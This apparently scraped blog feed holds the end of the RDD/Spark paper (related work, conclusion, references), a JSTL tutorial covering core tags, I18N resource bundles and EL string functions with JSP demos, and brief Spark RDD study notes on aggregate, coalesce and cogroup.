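Caching systems. Nectar [14] can reuse intermediate results across DryadLINQ jobs by identifying common subexpressions through program analysis. This capability would be very interesting to add to an RDD-based system. However, Nectar does not provide in-memory caching, nor does it let users explicitly control which datasets to cache and how to partition them. Ciel [23] can likewise memoize task results, but it does not provide in-memory caching or explicit control over it.

Language integration. Spark's language integration is similar to that of DryadLINQ [34], which uses LINQ to capture expression trees and run them on a cluster. Unlike DryadLINQ, Spark lets users explicitly keep RDDs in memory across queries and control their partitioning to optimize communication. Spark also supports interactive use, which DryadLINQ does not.

Relational databases. Conceptually, RDDs resemble views in a database, and cached RDDs resemble materialized views [29]. However, like DSM systems, databases typically allow read-write access to all records; they achieve fault tolerance by logging operations and data, and they incur extra overhead to maintain consistency. The RDD programming model avoids these overheads by being more restricted.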

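9. Conclusion

We have presented RDDs, a distributed memory abstraction for data-parallel applications running on clusters of commodity machines. RDDs support a broad range of working-set applications, including iterative machine learning and graph algorithms as well as interactive data mining, while retaining the attractive properties of the dataflow model: automatic fault recovery, handling of straggling tasks, and locality-aware scheduling. This is achieved by restricting the programming model so that RDD partitions can be rebuilt efficiently. Our RDD implementation runs iterative jobs about 20 times faster than Hadoop and can also be used to query hundreds of gigabytes of data interactively.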

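Acknowledgements

We first thank the Spark users, including Timothy Hunter, Lester Mackey, Dilip Joseph, Jibin Zhan, and Teodor Moldovan, who used Spark in real applications, offered valuable suggestions, and uncovered some new research challenges along the way. This research was made possible by the generous support of the following organizations: Berkeley AMP Lab founding sponsors Google and SAP; AMP Lab sponsors Amazon Web Services, Cloudera, Huawei, IBM, Intel, Microsoft, NEC, NetApp, and VMWare; State of California MICRO program matching funds (grants 06-152 and 07-010); the National Science Foundation (grant CNS-0509559); the University of California Industry/University Cooperative Research Program (UC Discovery) grant COM07-10240; and the Natural Sciences and Engineering Research Council of Canada.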

References

[1] Amazon EC2. http://aws.amazon.com/ec2.
[2] Apache Hadoop. http://hadoop.apache.org.
[3] Apache Hive. http://hadoop.apache.org/hive.
[4] Applications powered by Hadoop. http://wiki.apache.org/hadoop/PoweredBy.
[5] Scala. http://www.scala-lang.org.
[6] R. Bose and J. Frew. Lineage retrieval for scientific data processing: a survey. ACM Computing Surveys, 37:1–28, 2005.
[7] S. Brin and L. Page. The anatomy of a large-scale hypertextual web search engine. In WWW, 1998.
[8] Y. Bu, B. Howe, M. Balazinska, and M. D. Ernst. HaLoop: efficient iterative data processing on large clusters. Proc. VLDB Endow., 3:285–296, September 2010.
[9] C. Chambers, A. Raniwala, F. Perry, S. Adams, R. R. Henry, R. Bradshaw, and N. Weizenbaum. FlumeJava: easy, efficient data-parallel pipelines. In Proceedings of the 2010 ACM SIGPLAN conference on Programming language design and implementation, PLDI ’10. ACM, 2010.
[10] J. Cheney, L. Chiticariu, and W.-C. Tan. Provenance in databases: Why, how, and where. Foundations and Trends in Databases, 1(4):379–474, 2009.
[11] C. T. Chu, S. K. Kim, Y. A. Lin, Y. Yu, G. R. Bradski, A. Y. Ng, and K. Olukotun. Map-reduce for machine learning on multicore. In NIPS ’06, pages 281–288. MIT Press, 2006.
[12] J. Dean and S. Ghemawat. MapReduce: Simplified data processing on large clusters. In OSDI, 2004.
[13] J. Ekanayake, H. Li, B. Zhang, T. Gunarathne, S.-H. Bae, J. Qiu, and G. Fox. Twister: a runtime for iterative mapreduce. In HPDC ’10, 2010.
[14] P. K. Gunda, L. Ravindranath, C. A. Thekkath, Y. Yu, and L. Zhuang. Nectar: automatic management of data and computation in datacenters. In OSDI ’10, 2010.
[15] T. Hastie, R. Tibshirani, and J. Friedman. The Elements of Statistical Learning: Data Mining, Inference, and Prediction. Springer Publishing Company, New York, NY, 2009.
[16] U. Hoelzle and L. A. Barroso. The Datacenter as a Computer: An Introduction to the Design of Warehouse-Scale Machines. Morgan and Claypool Publishers, 1st edition, 2009.
[17] Mobile Millennium Project. http://traffic.berkeley.edu.
[18] M. Isard, M. Budiu, Y. Yu, A. Birrell, and D. Fetterly. Dryad: distributed data-parallel programs from sequential building blocks. In EuroSys 07, 2007.
[19] A.-M. Kermarrec, G. Cabillic, A. Gefflaut, C. Morin, and I. Puaut. A recoverable distributed shared memory integrating coherence and recoverability. In FTCS ’95, 1995.
[20] S. Y. Ko, I. Hoque, B. Cho, and I. Gupta. On availability of intermediate data in cloud computations. In HotOS ’09, 2009.
[21] G. Malewicz, M. H. Austern, A. J. Bik, J. C. Dehnert, I. Horn, N. Leiser, and G. Czajkowski. Pregel: a system for large-scale graph processing. In SIGMOD, pages 135–146, 2010.
[22] S. Melnik, A. Gubarev, J. J. Long, G. Romer, S. Shivakumar, M. Tolton, and T. Vassilakis. Dremel: interactive analysis of web-scale datasets. Proc. VLDB Endow., 3:330–339, Sept 2010.
[23] D. G. Murray, M. Schwarzkopf, C. Smowton, S. Smith, A. Madhavapeddy, and S. Hand. Ciel: a universal execution engine for distributed data-flow computing. In NSDI, 2011.
[24] B. Nitzberg and V. Lo. Distributed shared memory: a survey of issues and algorithms. Computer, 24(8):52–60, Aug 1991.
[25] C. Olston, B. Reed, U. Srivastava, R. Kumar, and A. Tomkins. Pig latin: a not-so-foreign language for data processing. In SIGMOD ’08, pages 1099–1110.
[26] J. Ousterhout, P. Agrawal, D. Erickson, C. Kozyrakis, J. Leverich, D. Mazières, S. Mitra, A. Narayanan, G. Parulkar, M. Rosenblum, S. M. Rumble, E. Stratmann, and R. Stutsman. The case for RAMClouds: scalable high-performance storage entirely in DRAM. SIGOPS Oper. Syst. Rev., 43:92–105, Jan 2010.
[27] D. Peng and F. Dabek. Large-scale incremental processing using distributed transactions and notifications. In OSDI 2010.
[28] R. Power and J. Li. Piccolo: Building fast, distributed programs with partitioned tables. In Proc. OSDI 2010, 2010.
[29] R. Ramakrishnan and J. Gehrke. Database Management Systems. McGraw-Hill, Inc., 3rd edition, 2003.
[30] D. Spiewak and T. Zhao. ScalaQL: Language-integrated database queries for Scala. In SLE, pages 154–163, 2009.
[31] K. Thomas, C. Grier, J. Ma, V. Paxson, and D. Song. Design and evaluation of a real-time URL spam filtering service. In IEEE Symposium on Security and Privacy, 2011.
[32] L. G. Valiant. A bridging model for parallel computation. Commun. ACM, 33:103–111, August 1990.
[33] J. W. Young. A first order approximation to the optimum checkpoint interval. Commun. ACM, 17:530–531, Sept 1974.
[34] Y. Yu, M. Isard, D. Fetterly, M. Budiu, U. Erlingsson, P. K. Gunda, and J. Currey. DryadLINQ: A system for general-purpose distributed data-parallel computing using a high-level language. In OSDI ’08, 2008.

Author: china_demon. Posted 2016/8/1 4:04:59.


↧

Web---JSTL (the standard tag library for JSP): the Core tag library, I18N internationalization, and the function library

August 1, 2016, 4:21 am

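This post covers the JSTL core tags, I18N support, and the common EL functions; each description is followed by a concrete demo.

About JSTL:

JSTL stands for JavaServer Pages Standard Tag Library.
It is a specification for a set of standard tags, defined by Sun.
The tag library itself is implemented as a set of Java classes.

Parts of JSTL:

JSTL Core: the core tag library. This is the main focus.
JSTL I18N: the internationalization tag library (Internationalization, I18N).
JSTL SQL: database tags (at odds with the MVC pattern); rarely used today.
JSTL Functions: the function library.
JSTL XML: XML processing tags (like the SQL tags, at odds with the MVC pattern); rarely used today.

The JSTL core tag library:

Using the core tags:
If your web project targets Java EE 5 (web module version 2.5) or later, any page in the project can use the JSTL core tag library through the <%@ taglib directive.

<%@ taglib uri="http://java.sun.com/jsp/jstl/core"  prefix="c"%>

uri is the identifier of the tag library; it does not have to be a reachable address.
prefix is a prefix of your own choosing.

If your project targets an older version than that, the lib directory of the project must contain these two jar files:
jstl.jar, standard.jar
These jars contain the JSTL tld files, which describe the attributes, names, and resources of the JSTL tags.
The container uses the tld files to find the Java classes that implement the tags.
After that, any JSP page can import JSTL with the taglib directive.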

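JSTL Core contains the following tags:

<c:out>         outputs a value, like ${name}
<c:set>         sets a scoped variable, like pageContext.setAttribute(key, value, scope)
<c:remove>      removes a variable from a scope
<c:if>          simple conditional (JSTL has no c:else or c:elseif)
<c:choose> <c:when> <c:otherwise>   multi-branch conditional (if / else if / else)
<c:forEach>     iteration
<c:forTokens>   iteration over the tokens of a delimited string
<c:import>      includes another resource, like a dynamic include that shares the same request
<c:url>         URL rewriting
<c:redirect>    redirect, like response.sendRedirect(...)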

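The JSTL out tag:

Attribute    Accepted values                                      Description
value        EL expression, Java expression, or literal string   the content to output
escapeXml    true | false                                         whether to escape HTML as &lt; &gt; &quot; and so on
default      a default value                                      output when the value does not exist

<c:out  value=…/> writes a result to the page.
<c:out value="${requestScope.name}"/> outputs the name attribute of the request.
<c:out value="${param.username}"/> outputs a request parameter.
<c:out value="${name}" default="hello"/> searches the scopes from page up to application and, if nothing is found, shows the default value hello.
Another way to set the default:
<c:out value="${name}">
Default-value
</c:out>
The default is output only when the requested value is null or does not exist.
The escapeXml attribute defaults to true and converts HTML markup into entities such as &lt;. Example:
 <%
     String name="<font color='red'>Red</font>";
      pageContext.setAttribute("name",name);
  %>
<c:out value="${name}" escapeXml="false"></c:out> does not escape XML or HTML and outputs the value as is, so the page shows the word Red in red because the browser interprets the markup.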
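To make the effect of escapeXml="true" concrete, here is a minimal plain-Java sketch of the kind of character replacement c:out performs. The class and method names are hypothetical, and the numeric entities used for the two quote characters are an assumption based on common JSTL implementations, not something stated above.

```java
class EscapeXmlSketch {
    // Hypothetical helper: replaces the five characters that matter in HTML/XML.
    // The &#039; and &#034; forms for quotes are an assumption about the implementation.
    static String escapeXml(String text) {
        StringBuilder out = new StringBuilder();
        for (char c : text.toCharArray()) {
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '\'': out.append("&#039;"); break;
                case '"':  out.append("&#034;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // The same value as in the scriptlet above; the browser would show the markup as text.
        System.out.println(escapeXml("<font color='red'>Red</font>"));
    }
}
```

With escaping on, the browser displays the tag text itself instead of a red word, which is why the demo switches escapeXml to false.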

JSTL Core demo (the prefix is conventionally c):

—–jstl.jsp:

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>

<%@taglib uri="http://java.sun.com/jsp/jstl/core"  prefix="c" %>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
  </head>

  <body>
      <h1>JSTL demo</h1>

      <!-- c:out -->
      <%
        pageContext.setAttribute("name", "Tom");
        pageContext.setAttribute("name2", "<font color='red'>Tom</font>");
      %>
      <c:out value="${name}"></c:out><br/>

      ${name}<br/>

      <c:out value="${name2}" escapeXml="true" /><br/>
      ${name2}<br/>

      <!-- c:if -->
      <c:if test="${20>10}" var="boo" scope="session">
        OKOK<br/>
      </c:if>
      <!-- There is no c:else; for an if-else, add a second c:if that negates the stored result -->
      <c:if test="${!boo}">
        NONO<br/>
      </c:if>

      <br/><!-- The EL conditional operator (?:) can express a simple if-else -->
      ${ 20>10?"yes":"no" }<br/>

      <hr/>
      <!-- forEach -->
      <%
        List list = new ArrayList();
        list.add("aaaaa111");
        list.add("bbbbb222");
        list.add(200);
        list.add(100);
        request.setAttribute("list", list);
      %>
      <table border="1px">
        <c:forEach items="${list}" var="li">
            <tr> <td>:: ${li}</td>  </tr>
        </c:forEach>
      </table>

      <%
        Map<String,Object> map = new HashMap<String,Object>();
        map.put("name", "Pose");
        map.put("age", 55);
        map.put("tel", "12345678911");
        pageContext.setAttribute("map", map);     
      %>
      <br/>
      <c:forEach items="${map}" var="m">
        ${m.key} = ${m.value}<br/>
      </c:forEach>

      <%
        String strs[] = {"aaa","bbb","ccc","ddd"};
        pageContext.setAttribute("strs", strs);
      %>
      <br/>
      <c:forEach items="${strs}" var="str">
        ${str},      
      </c:forEach>
      <br/>

      <h3>The varStatus attribute of forEach: idx.index is the index of the element (counted from begin) and idx.count is the iteration count (starting from 1)</h3>
      <c:forEach items="${strs}" var="str" varStatus="idx">
        ${str}---index = ${idx.index} --- count=${idx.count}<br/>       
      </c:forEach>

      <!-- forEach used as a plain counting loop -->
      <c:forEach begin="20" end="40" var="i" step="2" varStatus="idx">
        ${i} -- ${idx.index} -- ${idx.count}<br/>
      </c:forEach>

      <br/>
      <!-- c:set sets an attribute; the default scope is page -->
      <c:set var="aa" value="abc123" />
      <c:set var="aa" value="cccc222" scope="request"/>
      ${aa},${requestScope.aa}<br/>

      <br/>

      <!-- c:remove removes an attribute -->
      <!-- Without a scope attribute, the attribute is removed from all four scopes (page, request, session, application); with one, only from the given scope -->
      <c:remove var="aa" scope="request"/>
      ${aa},${requestScope.aa}<br/>

      <!-- c:choose, c:when, c:otherwise -->
      <!-- Like switch-case-default in Java, with an implicit break after every branch -->
      <c:set var="score" value="98"></c:set>
      <c:choose>
        <c:when test="${score>=90}">
            Excellent
        </c:when>
        <c:when test="${score>=80}">
            Good
        </c:when>
        <c:when test="${score>=70}">
            Fair
        </c:when>
        <c:otherwise>
            Fail
        </c:otherwise>
      </c:choose>

      <br/>
      <!-- c:forTokens splits a string on the given delimiters -->
      <c:forTokens items="aa,ds,sdf,df,dddd,sss" delims="," var="str">
        ${str}&nbsp;
      </c:forTokens>
      <br/>

      <!-- c:import includes another resource, like a dynamic include; it shares the same request but is compiled into a separate class -->
      <c:import url="/jsps/b.jsp"></c:import>
      <br/>

      <!-- c:redirect redirects, like response.sendRedirect(...) -->
      <%-- 
      <c:redirect url="/jsps/a.jsp"></c:redirect>
      --%>


      <br/><br/><br/><br/>
  </body>
</html>
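The difference between idx.index and idx.count in the counting loop of jstl.jsp (begin="20" end="40" step="2") can be sketched in plain Java. This is only an illustration of the semantics described in the page, with hypothetical class and method names; it is not how the tag is implemented.

```java
import java.util.ArrayList;
import java.util.List;

class LoopStatusSketch {
    // Builds one line per iteration in the same "i -- index -- count" layout as the JSP.
    static List<String> rows(int begin, int end, int step) {
        List<String> rows = new ArrayList<>();
        int count = 0;                       // idx.count: always starts at 1
        for (int index = begin; index <= end; index += step) {
            count++;
            int i = index;                   // without items, var holds the current index
            rows.add(i + " -- " + index + " -- " + count);
        }
        return rows;
    }

    public static void main(String[] args) {
        rows(20, 40, 2).forEach(System.out::println);
    }
}
```

The index follows begin and step, while the count simply numbers the iterations, so the two only coincide by accident.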

—–b.jsp:

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
  </head>

  <body>
    <h3>This is the content of the dynamically imported page...b.jsp...</h3>
  </body>
</html>

a.jsp is not listed here. It exists only to demonstrate the JSTL redirect, and its source is of no interest.

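Internationalization in JSTL (I18N):

Before the JSTL demo, let us warm up with internationalization in plain Java.

First create three files in the src directory. Judging by the comments in the Java code below, they are msg_en_US.properties, msg_zh_CN.properties, and msg.properties.

Set their contents in that order (a blank line marks the start of the next file, three files in total):

welcome=welcome you---US
time=this time is:---US

welcome=\u6B22\u8FCE\u4F60---CN
time=\u73B0\u5728\u65F6\u95F4\u662F\uFF1A---CN

welcome=welcome
time=this time is: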
I18nDemo.java

package cn.hncu.i18n;

import java.util.Locale;
import java.util.ResourceBundle;

public class I18nDemo {

    public static void main(String[] args){
        // The argument is the base name; here the resource files are named msg*.properties
        //ResourceBundle rd = ResourceBundle.getBundle("msg"); // prints: 欢迎你---CN:::现在时间是：---CN   (reads msg_zh_CN.properties)
        //ResourceBundle rd = ResourceBundle.getBundle("msg",Locale.US); // prints: welcome you---US:::this time is:---US   (reads msg_en_US.properties)
        ResourceBundle rd = ResourceBundle.getBundle("msg",Locale.CANADA); // prints: 欢迎你---CN:::现在时间是：---CN   (reads msg_zh_CN.properties)
        // This machine uses a Chinese locale. When no file matches the requested locale, the lookup is repeated with the system default locale; only if that also fails is the default msg.properties read.
        System.out.println(rd.getString("welcome")+":::"+rd.getString("time"));
    }
}

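From the Java demo above we can guess that internationalization in JSTL works in much the same way, since a JSP is translated into Java in the end.

About the I18N tags:

I18N is short for Internationalization: there are 18 letters between the initial I and the final N, hence i18n.

The Java core library has built-in support for i18n, and java.util.Locale is the most important class for it.
Let us look at Locale first.
An instance of Locale can be obtained in the following ways:
Locale ch = new Locale("zh","CN");
Locale ch = Locale.CHINA;
Or take the default:
Locale zh = Locale.getDefault();
The language and country can then be read with these methods:
getLanguage
getCountry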
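As a small illustration of the two accessors, the following sketch prints the language and country codes of a Locale. The class and method names are hypothetical; only Locale, getLanguage, and getCountry come from the text above.

```java
import java.util.Locale;

class LocaleSketch {
    // Joins the language and country codes the way resource file suffixes are written.
    static String describe(Locale locale) {
        return locale.getLanguage() + "_" + locale.getCountry();
    }

    public static void main(String[] args) {
        System.out.println(describe(Locale.CHINA));        // language zh, country CN
        System.out.println(describe(Locale.US));           // language en, country US
        System.out.println(describe(Locale.getDefault())); // depends on the machine
    }
}
```

The joined form is the same suffix that appears in resource file names such as msg_zh_CN.properties.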

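The java.util.ResourceBundle class manages resources that depend on a Locale.
ResourceBundle provides static factory methods for creating ResourceBundle objects, including:
getBundle(String baseName): loads the bundle with the given base name for the default locale
getBundle(String baseName,Locale locale): loads the bundle for the given locale
The baseName argument is the name of the resource file without its locale suffix; resource files usually have the extension properties.

Resource files are named as follows:
Default resource file: resources.properties
English resource file: resources_en_US.properties
Chinese resource file: resources_zh_CN.properties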
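The naming rule can be checked against the JDK itself. The sketch below asks ResourceBundle.Control which bundle names it would try for one requested locale, most specific first. The class and method names are hypothetical; getCandidateLocales and toBundleName are standard JDK methods. It covers a single locale only and does not model the later retry with the system default locale.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import java.util.ResourceBundle;

class BundleLookupSketch {
    // Lists the bundle names tried for a single locale, most specific first.
    static List<String> candidateNames(String baseName, Locale locale) {
        ResourceBundle.Control control =
                ResourceBundle.Control.getControl(ResourceBundle.Control.FORMAT_DEFAULT);
        List<String> names = new ArrayList<>();
        for (Locale candidate : control.getCandidateLocales(baseName, locale)) {
            names.add(control.toBundleName(baseName, candidate));
        }
        return names;
    }

    public static void main(String[] args) {
        System.out.println(candidateNames("msg", Locale.US));
        System.out.println(candidateNames("msg", Locale.CANADA));
    }
}
```

For Locale.CANADA none of the locale-specific names exist in the demo project, which is why the lookup moves on to the default locale and finally to the plain base name.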

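Demo code:

Prepare two more resource files (they use the base name a, as referenced by basename="a" below).

Each contains a single entry:

address=beijing

address=\u5317\u4EAC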

i18n.jsp:

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>

<%@taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c" %>
<%@taglib uri="http://java.sun.com/jsp/jstl/fmt" prefix="fmt" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
    <fmt:setLocale value="zh_CN"/>
    <fmt:setBundle basename="msg"/>
    <!-- In a real internationalized site, the code that sets the Locale and the Bundle belongs in the head; the page body only displays -->
  </head>

  <body>
    张三，<fmt:message key="welcome"></fmt:message>
    <fmt:message key="time" /> 2016-**-**
    <br/><hr/>
    <!-- Unlike the version above, the locale is now passed in as a request parameter -->
    <a href="?loc=en_US">English</a><!-- An href that starts with "?" points back to the current page -->
    <a href="?loc=zh_CN">中文</a>
    <fmt:setLocale value="${param.loc}"/>
    <fmt:setBundle basename="msg"/>
    张三，<fmt:message key="welcome"></fmt:message>
    <fmt:message key="time" /> 2016-**-**

    <br/><hr/>
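    <!-- Now several bundles at once: the second and later bundles must be given a variable name. The one without a name is the default bundle -->
    <fmt:setBundle basename="a" var="aaa" scope="session"/>
    <!-- If several pages need this bundle, set its scope to session -->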

    张三，<fmt:message key="welcome"></fmt:message>
    <fmt:message key="time" /> 2016-**-**
    <br/><br/>
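    <%-- To read from a non-default bundle, name it through its variable, here aaa, by writing bundle="${aaa}". Without a bundle attribute the default bundle is used --%>
    <fmt:message key="address" bundle="${aaa}"></fmt:message>
    <br/><br/>

    <a href='<c:url value="/jsps/c.jsp"></c:url>'>Take a look at another page of the site</a>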

  </body>
</html>

c.jsp:

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>

<%@taglib uri="http://java.sun.com/jsp/jstl/fmt"  prefix="fmt"%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
  </head>

  <body>
    <!-- Reads from the bundle stored in session scope -->
    <fmt:message key="address" bundle="${aaa}"></fmt:message>
    <!-- The text appears in whichever language was in effect when i18n.jsp set up aaa -->
  </body>
</html>

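Of course, many sites today do not handle internationalization this way. They maintain several complete versions of the site and send you to the one that matches the language you pick.
That approach has an obvious drawback: what if there are many languages? Maintaining that many sites is clearly unreasonable. With I18N we need only one site template that reads its text from properties, plus one resource file per language. This is far more convenient when there are many languages, and it is the better architecture in any case.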

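Common EL functions in JSTL

Strings shown on a JSP page often need some processing first, so Sun defined a library of EL functions for the most common cases.
These functions are described in the JSTL package, so to use them a JSP page needs the JSTL jars and must import the function library,
as shown below (for this purpose JSTL can be thought of as the provider of the EL function library).
Using the EL functions defined by JSTL in a page:

<%@taglib uri="http://java.sun.com/jsp/jstl/functions" prefix="fn"%>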

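fn:toLowerCase

fn:toLowerCase takes one string argument, converts every character in it to lower case, and returns the converted string. For example:
fn:toLowerCase("Www.IT315.org") returns the string "www.it315.org"
fn:toLowerCase("") returns the empty string

fn:toUpperCase

fn:toUpperCase takes one string argument, converts every character in it to upper case, and returns the converted string. For example:
fn:toUpperCase("Www.IT315.org") returns the string "WWW.IT315.ORG"
fn:toUpperCase("") returns the empty string

fn:trim

fn:trim takes one string argument, removes the whitespace at both ends, and returns the result. Note that fn:trim does not remove spaces in the middle of the string.
For example, fn:trim(" www.it 315.org ") returns the string "www.it 315.org".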

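fn:length

fn:length returns the number of elements in a collection or array, or the number of characters in a string. The return type is int.

fn:length takes one argument, which may be of any type supported by the items attribute of <c:forEach>: arrays of any type, instances of java.util.Collection, java.util.Iterator, java.util.Enumeration, java.util.Map and so on, and strings.

If the argument is null, or a collection or array with no elements, the function returns 0; if the argument is the empty string, it also returns 0.

fn:split

fn:split splits a string into an array of strings, using the given string as the delimiter, and returns that array.

fn:split takes two string arguments: the first is the string to split, the second is the delimiter.

For example, fn:split("www.it315.org", ".")[1] returns the string "it315".

fn:join

fn:join merges all elements of a string array into one string, separated by the given string, and returns the result. It takes two arguments: the first is the string array, the second is the separator.

If the second argument is the empty string, fn:join simply concatenates the elements.
For example:
If stringArray is an attribute stored in a web scope and holds the string array {"www","it315","org"}, then fn:join(stringArray, ".") returns the string "www.it315.org"
fn:join(fn:split("www,it315,org", ","), ".") returns the string "www.it315.org"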

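fn:indexOf

fn:indexOf returns the index at which a given string first occurs in another string. The return type is int.
fn:indexOf takes two string arguments. If the first string contains the second, the function returns the index of the first occurrence, no matter how many times the second string occurs;
if the first string does not contain the second, fn:indexOf returns -1.
If the second argument is the empty string, fn:indexOf always returns 0.
For example:
fn:indexOf("www.it315.org","t3") returns 5

fn:contains

fn:contains tests whether a string contains a given string. The return type is boolean.

The comparison in fn:contains is case sensitive.
fn:contains takes two string arguments and returns true if the first string contains the second, false otherwise.

If the second argument is the empty string, fn:contains always returns true. In fact, fn:contains(string, substring) is equivalent to fn:indexOf(string, substring) != -1.

For a case-insensitive test,
use fn:containsIgnoreCase, which takes the same arguments as fn:contains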

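fn:startsWith

fn:startsWith tests whether a string starts with a given string. The return type is boolean.

fn:startsWith takes two string arguments and returns true if the first string starts with the second, false otherwise. If the second argument is the empty string, fn:startsWith always returns true. For example:

fn:startsWith("www.it315.org","it315") returns false

The matching function for the other end of the string is fn:endsWith

fn:replace

fn:replace replaces every occurrence of a given substring with another string and returns the result. It takes three string arguments: the source string, the substring to be replaced, and the replacement. For example:

fn:replace("www it315 org", " ", ".") returns the string "www.it315.org"

fn:substring

fn:substring extracts part of a string and returns it. It takes three arguments:
the first is the source string,
the second is the index at which the substring begins (inclusive),
the third is the index at which the substring ends (exclusive). The second and third arguments are of type int and count from 0. For example:

fn:substring("www.it315.org", 4, 9) returns the string "it315"

fn:substringAfter

fn:substringAfter returns the part of a string that follows the first occurrence of a given substring. It takes two string arguments: the source string and the substring to look for. For example:

fn:substringAfter("www.it315.org", ".") returns the string "it315.org".

The matching function for the part before the substring is fn:substringBefore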
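Most of these functions map closely onto java.lang.String, so the return values quoted above can be checked with a few lines of plain Java. The sketch below is an approximation with hypothetical helper names; in particular, treating the delimiter as a set of characters via StringTokenizer is an assumption about how fn:split behaves, not something stated in this post.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.StringTokenizer;

class ElFunctionSketch {
    // Approximates fn:split; assumes every character of 'delimiters' is a separator.
    static String[] split(String input, String delimiters) {
        List<String> tokens = new ArrayList<>();
        StringTokenizer tokenizer = new StringTokenizer(input, delimiters);
        while (tokenizer.hasMoreTokens()) {
            tokens.add(tokenizer.nextToken());
        }
        return tokens.toArray(new String[0]);
    }

    // Approximates fn:substringAfter; returns "" when the marker is absent (assumption).
    static String substringAfter(String input, String marker) {
        int index = input.indexOf(marker);
        return index < 0 ? "" : input.substring(index + marker.length());
    }

    public static void main(String[] args) {
        String host = "www.it315.org";
        System.out.println(split(host, ".")[1]);                        // fn:split(...)[1]
        System.out.println(String.join(".", split("www,it315,org", ","))); // fn:join(fn:split(...))
        System.out.println(host.indexOf("t3"));                         // fn:indexOf
        System.out.println(host.substring(4, 9));                       // fn:substring, end index exclusive
        System.out.println(substringAfter(host, "."));                  // fn:substringAfter
    }
}
```

Note that String.substring has the same inclusive-begin, exclusive-end convention as fn:substring, which is why indexes 4 and 9 select the five characters of "it315".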

Only a few of the common functions are demonstrated here:

Demo code:

fn.jsp:

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>

<%@taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c" %>
<%@taglib uri="http://java.sun.com/jsp/jstl/functions" prefix="fn" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
  </head>

  <body>
    <c:set value="hello word function" var="str"></c:set>
    ${fn:indexOf(str,"wor")}<br/><br/>
    ${fn:contains(str,"Func")}<br/><br/>
    ${fn:containsIgnoreCase(str,"Func")}<br/><br/>
    ${fn:trim(str).length()}<br/>
  </body>
</html>

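Results:

${fn:indexOf(str,"wor")}  // "wor" first matches at index 6 (counting from 0), so the output is 6
${fn:contains(str,"Func")} // case sensitive; str does not contain "Func", so the output is false
${fn:containsIgnoreCase(str,"Func")} // case insensitive; str contains "func", so the output is true
${fn:trim(str).length()} // trim() strips leading and trailing whitespace and length() returns the length of "hello word function", which is 19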

Author: qq_26525215. Posted 2016/8/1 4:21:59.


↧

RDD study notes

August 1, 2016, 4:29 am

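1. Driver program ----> runs the main function

Shared variables: tasks running on different nodes sometimes need to share the variables used inside a function

1. Broadcast variables: cached in memory on each node rather than shipped with every task

2. Accumulators: variables that can only be added to

Master URLs:

local: run locally

local[K]: run locally with K threads in parallel

aggregate:

The function takes three arguments: the initial value zeroValue, then seqOp, then combOp.

seqOp runs in parallel; the tasks on each executor apply it within their own partition

combOp runs serially; it is invoked from the taskSucceeded function of JobWaiter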

val z = sc.parallelize(List(1,2,3,4,5,6), 2)

z.aggregate(0)(math.max(_, _), _ + _)

res40: Int = 9

val z =sc.parallelize(List("a","b","c","d","e","f"),2)

z.aggregate("")(_ + _, _+_)

res115: String = abcdef
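Why the first example yields 9 becomes clear when the two phases are written out by hand. The following plain-Java sketch simulates aggregate without Spark, under the simplifying assumptions that the result type equals the element type and that partition results are merged in order (Spark itself gives no ordering guarantee). All names are hypothetical.

```java
import java.util.List;
import java.util.function.BinaryOperator;

class AggregateSketch {
    // Folds every partition with seqOp starting from zero, then merges the
    // partition results with combOp, again starting from zero.
    static <T> T aggregate(List<List<T>> partitions, T zero,
                           BinaryOperator<T> seqOp, BinaryOperator<T> combOp) {
        T result = zero;
        for (List<T> partition : partitions) {
            T partial = zero;
            for (T item : partition) {
                partial = seqOp.apply(partial, item);
            }
            result = combOp.apply(result, partial);
        }
        return result;
    }

    public static void main(String[] args) {
        // Two partitions as in sc.parallelize(List(1,2,3,4,5,6), 2): max 3 and max 6, summed.
        List<List<Integer>> two = List.of(List.of(1, 2, 3), List.of(4, 5, 6));
        System.out.println(aggregate(two, 0, (a, b) -> Math.max(a, b), (a, b) -> a + b));

        // The same data in three partitions gives a different answer: 2 + 4 + 6.
        List<List<Integer>> three = List.of(List.of(1, 2), List.of(3, 4), List.of(5, 6));
        System.out.println(aggregate(three, 0, (a, b) -> Math.max(a, b), (a, b) -> a + b));
    }
}
```

The second call shows that mixing max and sum makes the result depend on how the data is partitioned, so this combination is only safe when the partitioning is known.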

cartesian:

Computes the Cartesian product of two RDDs:

def cartesian[U: ClassTag](other: RDD[U]): RDD[(T, U)]

coalesce:

Repartitions the RDD into the given number of partitions:

def coalesce ( numPartitions : Int , shuffle : Boolean= false ): RDD [T]

val y = sc.parallelize(1 to 10, 10)

val z = y.coalesce(2, false)

z.partitions.length

res9: Int = 2

cogroup:

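Reportedly a very powerful function. It groups the values of up to three key-value RDDs by their shared key; more RDDs than that cannot be combined in one call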

Listing Variants

def cogroup[W](other: RDD[(K, W)]): RDD[(K, (Seq[V],Seq[W]))]

def cogroup[W](other: RDD[(K, W)], numPartitions:Int): RDD[(K, (Seq[V], Seq[W]))]

def cogroup[W](other: RDD[(K, W)], partitioner:Partitioner): RDD[(K, (Seq[V], Seq[W]))]

def cogroup[W1, W2](other1: RDD[(K, W1)], other2:RDD[(K, W2)]): RDD[(K, (Seq[V], Seq[W1], Seq[W2]))]

def cogroup[W1, W2](other1: RDD[(K, W1)], other2:RDD[(K, W2)], numPartitions: Int): RDD[(K, (Seq[V], Seq[W1], Seq[W2]))]

